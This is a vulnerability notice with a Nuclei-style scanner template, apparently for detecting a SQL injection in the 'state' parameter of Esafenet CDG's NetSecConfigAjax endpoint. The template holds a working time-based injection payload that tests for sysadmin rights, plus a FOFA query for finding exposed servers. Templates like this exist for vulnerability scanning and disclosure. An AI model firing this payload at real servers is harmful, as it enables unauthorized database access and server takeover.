The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
PoC代码[已公开]
id: esafenet-netsecconfigajax-sqli
info:
name: Esafenet CDG NetSecConfigAjax - Sql Injection
author: adeljck
severity: high
description: |
The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
classification:
cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: esafenet
product: cdg
fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
tags: esafenet,sqli
http:
- raw:
- |
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
matchers:
- type: dsl
dsl:
- 'contains(content_type,"text/html")'
- 'contains(body,"操作成功")'
- 'status_code == 200'
condition: and
# digest: 490a004630440220647b92b80ee43fa2538fda766fbd134f952b7b90f57b2d992d6a2f631f037a190220525ac4f6ead3e8cbcf40ade3942d5542cf81f4c71bb505c08edb75467d0705ef:922c64590222798bb761d5b6d8e72950